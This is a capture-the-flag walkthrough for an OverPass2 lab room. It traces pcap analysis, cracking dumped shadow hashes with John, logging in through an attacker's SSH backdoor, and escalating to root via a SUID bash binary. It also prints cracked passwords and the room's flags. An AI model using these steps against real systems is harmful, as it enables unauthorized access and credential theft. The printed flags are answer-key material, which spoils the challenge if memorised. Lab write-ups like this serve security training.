OverPass2

Target Details

  • IP: 10.10.145.49

Analyze pcap file

  • Download pcap file

  • Open with wireshark

    sudo wireshark

  • Follow TCP streams, you'll find all the answers to the questions

Crack Hashes from the WireShark packets

  • Download fasttrack wordlist

  • Dump users from shadow file while analyzing packets in shadow_dump.txt file

  • User Shadow File Passwords using John

    john -w=/usr/share/wordlists/fasttrack.txt shadow_dump.txt

    user hashes are stored in shadow_dump.txt file

    UsernamePassword

    bee

    secret12

    szymex

    abcd123

    muirland

    1qaz2wsx

    paradox

    secuirty3

  • Get hash from packet file and hard coded salt from ssh-backdoor GitHub repo

  • Store them in hash.txt file in hash:salt format

  • Crack using John

    john -w=/usr/share/wordlists/rockyou.txt hash.txt
    UsernamePassword

    james

    november16

Hack Again

  • Login using Backdoor SSH, since we already know the password

    ssh -p 2222 james@10.10.145.49

  • Get User Flag

    cat /home/james/user.txt
# thm{d119b4fa8c497ddb0525f7ad200e6567}

  • On listing hidden files, we get .suid_bash which can be run as root

    /home/james/.suid_bash -p
.suid_bash-4.4#

  • We've rooted the machine

    .suid_bash-4.4# whoami
root

  • Get root flag

    .suid_bash-4.4# cat /root/root.txt
thm{d53b2684f169360bb9606c333873144d}
PreviousOverPassNextAgent T

Last updated